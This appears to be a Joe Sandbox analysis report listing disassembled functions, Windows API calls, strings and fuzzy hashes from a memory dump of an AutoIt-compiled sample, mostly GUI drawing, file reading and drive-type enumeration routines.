Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
Instruction ID: c49b6bbe16f3e0dae372dca2f86de2bf932e87af934b39b8e56e4f3dd2c53a1f
Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
Instruction Fuzzy Hash: 48C1B4322051A70EDF6E473D983593EBAB15AA2BB171B077DE4B2CB4D5EF20C524D620

Function 00A2FE6F Relevance: .3, Instructions: 331COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
Instruction ID: ee06879f37265c24b7fc7f4b31debf5dac5291647733a5d81891503e134e1bc4
Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
Instruction Fuzzy Hash: 18C182322051A70EDF2E4B3E983593EBAB15AA27B171B077DE4B2CB5D5EF20C524D610

Function 00A2FA57 Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: 0e8cde8f06f76785fad1d5f0a67cd6af537d951f34a54f4f31d7901c342f50d8
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: B4C160322050A70DDF2E4B3DE87543EBAB15AA2BB531A077DD8B2CB5D5EE20C564D620

Function 00A6A2A9 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 490filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00A6A2FE
DeleteObject.GDI32(00000000), ref: 00A6A310
DestroyWindow.USER32 ref: 00A6A31E
GetDesktopWindow.USER32 ref: 00A6A338
GetWindowRect.USER32(00000000), ref: 00A6A33F
SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00A6A480
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00A6A490
CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A6A4D8
GetClientRect.USER32(00000000,?), ref: 00A6A4E4
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00A6A51E
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A6A540
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A6A553
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A6A55E
GlobalLock.KERNEL32(00000000), ref: 00A6A567
ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A6A576
GlobalUnlock.KERNEL32(00000000), ref: 00A6A57F
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A6A586
GlobalFree.KERNEL32(00000000), ref: 00A6A591
CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A6A5A3
OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00A9D9BC,00000000), ref: 00A6A5B9
GlobalFree.KERNEL32(00000000), ref: 00A6A5C9
CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00A6A5EF
SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00A6A60E
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A6A630
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A6A81D

Strings

, xrefs: 00A6A7A3
AutoIt v3, xrefs: 00A6A4D0
static, xrefs: 00A6A518, 00A6A66F
DISPLAY, xrefs: 00A6A680

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: 76020497f8d0ca2524c994319bfd8a0fc7ad47fe99a83eaec74f0991ddf62123
Instruction ID: 0c404b3239079fc03b6c4f07944a7882f9899d20b94e117140888414a746db8a
Opcode Fuzzy Hash: 76020497f8d0ca2524c994319bfd8a0fc7ad47fe99a83eaec74f0991ddf62123
Instruction Fuzzy Hash: 5F027175A00214EFDB14DFA4DD89EAE7BB9FB48710F108159F915AB2A1CB709D82CF60

Function 00A7D285 Relevance: 49.8, APIs: 33, Instructions: 260COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 00A7D2DB
GetSysColorBrush.USER32(0000000F), ref: 00A7D30C
GetSysColor.USER32(0000000F), ref: 00A7D318
SetBkColor.GDI32(?,000000FF), ref: 00A7D332
SelectObject.GDI32(?,00000000), ref: 00A7D341
InflateRect.USER32(?,000000FF,000000FF), ref: 00A7D36C
GetSysColor.USER32(00000010), ref: 00A7D374
CreateSolidBrush.GDI32(00000000), ref: 00A7D37B
FrameRect.USER32(?,?,00000000), ref: 00A7D38A
DeleteObject.GDI32(00000000), ref: 00A7D391
InflateRect.USER32(?,000000FE,000000FE), ref: 00A7D3DC
FillRect.USER32(?,?,00000000), ref: 00A7D40E
GetWindowLongW.USER32(?,000000F0), ref: 00A7D439

Part of subcall function 00A7D575: GetSysColor.USER32(00000012), ref: 00A7D5AE
Part of subcall function 00A7D575: SetTextColor.GDI32(?,?), ref: 00A7D5B2
Part of subcall function 00A7D575: GetSysColorBrush.USER32(0000000F), ref: 00A7D5C8
Part of subcall function 00A7D575: GetSysColor.USER32(0000000F), ref: 00A7D5D3
Part of subcall function 00A7D575: GetSysColor.USER32(00000011), ref: 00A7D5F0
Part of subcall function 00A7D575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00A7D5FE
Part of subcall function 00A7D575: SelectObject.GDI32(?,00000000), ref: 00A7D60F
Part of subcall function 00A7D575: SetBkColor.GDI32(?,00000000), ref: 00A7D618
Part of subcall function 00A7D575: SelectObject.GDI32(?,?), ref: 00A7D625
Part of subcall function 00A7D575: InflateRect.USER32(?,000000FF,000000FF), ref: 00A7D644
Part of subcall function 00A7D575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00A7D65B
Part of subcall function 00A7D575: GetWindowLongW.USER32(00000000,000000F0), ref: 00A7D670
Part of subcall function 00A7D575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00A7D698

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
String ID:
API String ID: 3521893082-0
Opcode ID: 268116d239d186c8d68ac8fb3265d8f0527ec96d7c2d5a745870716f25e3c2fc
Instruction ID: a5f06cc1e225cf70fcfafcd411e0996a78a6aa82e3a259af041c00f2203616dc
Opcode Fuzzy Hash: 268116d239d186c8d68ac8fb3265d8f0527ec96d7c2d5a745870716f25e3c2fc
Instruction Fuzzy Hash: 71918072108301BFCB10DFA4DC48A6BBBB9FF85325F108A1AF566961A0DB71D985CB52

Function 00A2B8FD Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 491windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32 ref: 00A2B98B
DeleteObject.GDI32(00000000), ref: 00A2B9CD
DeleteObject.GDI32(00000000), ref: 00A2B9D8
DestroyIcon.USER32(00000000), ref: 00A2B9E3
DestroyWindow.USER32(00000000), ref: 00A2B9EE
SendMessageW.USER32(?,00001308,?,00000000), ref: 00A8D2AA
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00A8D2E3
MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 00A8D711

Part of subcall function 00A2B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00A2B759,?,00000000,?,?,?,?,00A2B72B,00000000,?), ref: 00A2BA58

SendMessageW.USER32 ref: 00A8D758
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00A8D76F
ImageList_Destroy.COMCTL32(00000000), ref: 00A8D785
ImageList_Destroy.COMCTL32(00000000), ref: 00A8D790

Strings

0, xrefs: 00A8D5A5

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
String ID: 0
API String ID: 464785882-4108050209
Opcode ID: df10db8c3a96d7eb81c800d8d58f0a5e2258ee57df4a9b41ed97636e0537f21c
Instruction ID: 1672403037a644424f5f7340a9dd3dec5ff12dfdaac4b0f7aafe0132aa55e509
Opcode Fuzzy Hash: df10db8c3a96d7eb81c800d8d58f0a5e2258ee57df4a9b41ed97636e0537f21c
Instruction Fuzzy Hash: 71126D302142119FDB15EF28D984BA9BBF5FF45304F144579EA89DB692CB31EC82CB61

Function 00A5DBC4 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 187COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00A5DBD6
GetDriveTypeW.KERNEL32(?,00AADC54,?,\\.\,00AADC00), ref: 00A5DCC3
SetErrorMode.KERNEL32(00000000,00AADC54,?,\\.\,00AADC00), ref: 00A5DE29

Strings

MMC, xrefs: 00A5DDE7
Fibre, xrefs: 00A5DDB6
1394, xrefs: 00A5DDA8
PhysicalDrive, xrefs: 00A5DC67
iSCSI, xrefs: 00A5DDCB
SSA, xrefs: 00A5DDAF
ATAPI, xrefs: 00A5DD9A
\\.\, xrefs: 00A5DC2B
SATA, xrefs: 00A5DDD9
Virtual, xrefs: 00A5DDEE
RAMDisk, xrefs: 00A5DCED
Unknown, xrefs: 00A5DCE3, 00A5DD8C
FileBackedVirtual, xrefs: 00A5DDF5
Network, xrefs: 00A5DD01
USB, xrefs: 00A5DDBD
ATA, xrefs: 00A5DDA1
RAID, xrefs: 00A5DDC4
Fixed, xrefs: 00A5DD0B
SAS, xrefs: 00A5DDD2
SCSI, xrefs: 00A5DD93
SSD, xrefs: 00A5DD50
Removable, xrefs: 00A5DD15
CDROM, xrefs: 00A5DCF7

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: c78181361b8e2a6e5404692b9b312a92fd49da0bf319aacb8d8075430ddc57da
Instruction ID: 2b626dc5913dce776ff089388d14dec7049606e06dd3282cf0c73371753daea3
Opcode Fuzzy Hash: c78181361b8e2a6e5404692b9b312a92fd49da0bf319aacb8d8075430ddc57da
Instruction Fuzzy Hash: 8A519232248302BBCA20EF20C982E69B7B0FB95716B11891DF847DB291DB74DD4DD642

Function 00A1CC24 Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 267COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00A1CC68
__wcsnicmp.LIBCMT ref: 00A1CC80
__wcsnicmp.LIBCMT ref: 00A1CC98
__wcsnicmp.LIBCMT ref: 00A1CCB0
__wcsnicmp.LIBCMT ref: 00A1CCC8
__wcsnicmp.LIBCMT ref: 00A1CCE0
__wcsnicmp.LIBCMT ref: 00A1CCF8
__wcsnicmp.LIBCMT ref: 00A1CD0C
__wcsnicmp.LIBCMT ref: 00A1CD4D
__wcsnicmp.LIBCMT ref: 00A1CD61
__wcsnicmp.LIBCMT ref: 00A1CD75
__wcsnicmp.LIBCMT ref: 00A1CD89

Strings

Bad directive syntax error, xrefs: 00A82ECB
#OnAutoItStartRegister, xrefs: 00A1CCAA
#comments-start, xrefs: 00A1CCF2, 00A1CD47
Unterminated group of comments, xrefs: 00A82FB4
Cannot parse #include, xrefs: 00A82FA1
#ce, xrefs: 00A1CD83
#notrayicon, xrefs: 00A1CC7A
#include-once, xrefs: 00A1CCC2
#include, xrefs: 00A1CCDA
#comments-end, xrefs: 00A1CD6F
#pragma compile, xrefs: 00A1CC62
#cs, xrefs: 00A1CD06, 00A1CD5B
#requireadmin, xrefs: 00A1CC92

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 1038674560-86951937
Opcode ID: 4d390e59207d6ebdf06af2009dfc861e622b35f3b8d09e48452901083b951f79
Instruction ID: 16d1c667be38b9f9c06c20601885dfdecf23b28b69ae3e4920cf7f34c14ca270
Opcode Fuzzy Hash: 4d390e59207d6ebdf06af2009dfc861e622b35f3b8d09e48452901083b951f79
Instruction Fuzzy Hash: 6B81F671680215BACB24BF68DE82FFE7B78AF15710F044029F946AB1C2EB60D991C395

Function 00A7C6E9 Relevance: 42.4, APIs: 23, Strings: 1, Instructions: 447windowCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 00A7C788
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00A7C83E
SendMessageW.USER32(?,00001102,00000002,?), ref: 00A7C859
SendMessageW.USER32(?,000000F1,?,00000000), ref: 00A7CB15

Strings

0, xrefs: 00A7C89C

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: MessageSend$Window
String ID: 0
API String ID: 2326795674-4108050209
Opcode ID: 749545f418391350da67fba93e32497d68fead1f98eb736a3d35e21b1a416b36
Instruction ID: 2588180270858b0b17b419ca5c20271e56a19d7c8a13d82e31aa7781383ecb5a
Opcode Fuzzy Hash: 749545f418391350da67fba93e32497d68fead1f98eb736a3d35e21b1a416b36
Instruction Fuzzy Hash: EFF1BE71204301AFD7218F24CC85BAABBE5FB89364F08C52DF59DD62A1CB74D945CB92

Function 00A7638D Relevance: 42.4, APIs: 1, Strings: 23, Instructions: 352COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,00AADC00), ref: 00A76449

Strings

ISVISIBLE, xrefs: 00A76455
SELECTSTRING, xrefs: 00A76626
EDITPASTE, xrefs: 00A7675B
FINDSTRING, xrefs: 00A76596
SETCURRENTSELECTION, xrefs: 00A765D6
GETLINE, xrefs: 00A7678B
HIDEDROPDOWN, xrefs: 00A76520
TABRIGHT, xrefs: 00A764BD
ISCHECKED, xrefs: 00A76659
UNCHECK, xrefs: 00A766A1
SENDCOMMANDID, xrefs: 00A767CA
DELSTRING, xrefs: 00A76569
CURRENTTAB, xrefs: 00A764DD
CHECK, xrefs: 00A7668B
GETLINECOUNT, xrefs: 00A766E4
SHOWDROPDOWN, xrefs: 00A76500
TABLEFT, xrefs: 00A764A7
GETCURRENTLINE, xrefs: 00A76704
GETCURRENTCOL, xrefs: 00A76724
GETCURRENTSELECTION, xrefs: 00A76603
ISENABLED, xrefs: 00A7648C
ADDSTRING, xrefs: 00A76536
GETSELECTED, xrefs: 00A766C1

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: BuffCharUpper
String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 3964851224-45149045
Opcode ID: 98e3dd2a2e937db80c1ac96046e03183095d497b1031fd47801fc79904c3a244
Instruction ID: c20814519cc20f954330db5a42597a4c8afa543a973958d9e9fcaa4e34f21bfb
Opcode Fuzzy Hash: 98e3dd2a2e937db80c1ac96046e03183095d497b1031fd47801fc79904c3a244
Instruction Fuzzy Hash: F2C196342046558BCB04EF14CA51FAE77A5AF98354F04C86DF85A5B392DB30ED4BCB86

Function 00A7D575 Relevance: 39.2, APIs: 26, Instructions: 186windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 00A7D5AE
SetTextColor.GDI32(?,?), ref: 00A7D5B2
GetSysColorBrush.USER32(0000000F), ref: 00A7D5C8
GetSysColor.USER32(0000000F), ref: 00A7D5D3
CreateSolidBrush.GDI32(?), ref: 00A7D5D8
GetSysColor.USER32(00000011), ref: 00A7D5F0
CreatePen.GDI32(00000000,00000001,00743C00), ref: 00A7D5FE
SelectObject.GDI32(?,00000000), ref: 00A7D60F
SetBkColor.GDI32(?,00000000), ref: 00A7D618
SelectObject.GDI32(?,?), ref: 00A7D625
InflateRect.USER32(?,000000FF,000000FF), ref: 00A7D644
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00A7D65B
GetWindowLongW.USER32(00000000,000000F0), ref: 00A7D670
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00A7D698
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00A7D6BF
InflateRect.USER32(?,000000FD,000000FD), ref: 00A7D6DD
DrawFocusRect.USER32(?,?), ref: 00A7D6E8
GetSysColor.USER32(00000011), ref: 00A7D6F6
SetTextColor.GDI32(?,00000000), ref: 00A7D6FE
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00A7D712
SelectObject.GDI32(?,00A7D2A5), ref: 00A7D729
DeleteObject.GDI32(?), ref: 00A7D734
SelectObject.GDI32(?,?), ref: 00A7D73A
DeleteObject.GDI32(?), ref: 00A7D73F
SetTextColor.GDI32(?,?), ref: 00A7D745
SetBkColor.GDI32(?,?), ref: 00A7D74F

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 267ba944673aaf191533434a44375a4d650b2a2be4ed0ce1a192a4d5de8e249f
Instruction ID: 8afc31a369920886a9d521065d658c7ecd940847f3e8d8a5efa1f994df294d5d
Opcode Fuzzy Hash: 267ba944673aaf191533434a44375a4d650b2a2be4ed0ce1a192a4d5de8e249f
Instruction Fuzzy Hash: F4513072900218AFDF10DFA8DD48EAE7B79FF48324F218516F915AB1A1DB719941CF50

Function 00A7B6C4 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 400windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00A7B7B0
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00A7B7C1
CharNextW.USER32(0000014E), ref: 00A7B7F0
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00A7B831
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00A7B847
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00A7B858
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00A7B875
SetWindowTextW.USER32(?,0000014E), ref: 00A7B8C7
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00A7B8DD
SendMessageW.USER32(?,00001002,00000000,?), ref: 00A7B90E
_memset.LIBCMT ref: 00A7B933
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00A7B97C
_memset.LIBCMT ref: 00A7B9DB
SendMessageW.USER32 ref: 00A7BA05
SendMessageW.USER32(?,00001074,?,00000001), ref: 00A7BA5D
SendMessageW.USER32(?,0000133D,?,?), ref: 00A7BB0A
InvalidateRect.USER32(?,00000000,00000001), ref: 00A7BB2C
GetMenuItemInfoW.USER32(?), ref: 00A7BB76
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00A7BBA3
DrawMenuBar.USER32(?), ref: 00A7BBB2
SetWindowTextW.USER32(?,0000014E), ref: 00A7BBDA

Strings

0, xrefs: 00A7BB4F

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1073566785-4108050209
Opcode ID: 4e1f75bf90140bf2d37a509e71f89252a88cd9e966a3b1e4de2739333582de40
Instruction ID: 43618aa31d033d7229d93f10ddb014e98cf0d4dd56bdc0ff20bc3aa3eaaf212f
Opcode Fuzzy Hash: 4e1f75bf90140bf2d37a509e71f89252a88cd9e966a3b1e4de2739333582de40
Instruction Fuzzy Hash: 9AE14CB5910218AFDB20DFA5CD84FEE7BB8EF45714F14C156FA19AA190DB708A81CF60

Function 00A7764F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00A7778A
GetDesktopWindow.USER32 ref: 00A7779F
GetWindowRect.USER32(00000000), ref: 00A777A6
GetWindowLongW.USER32(?,000000F0), ref: 00A77808
DestroyWindow.USER32(?), ref: 00A77834
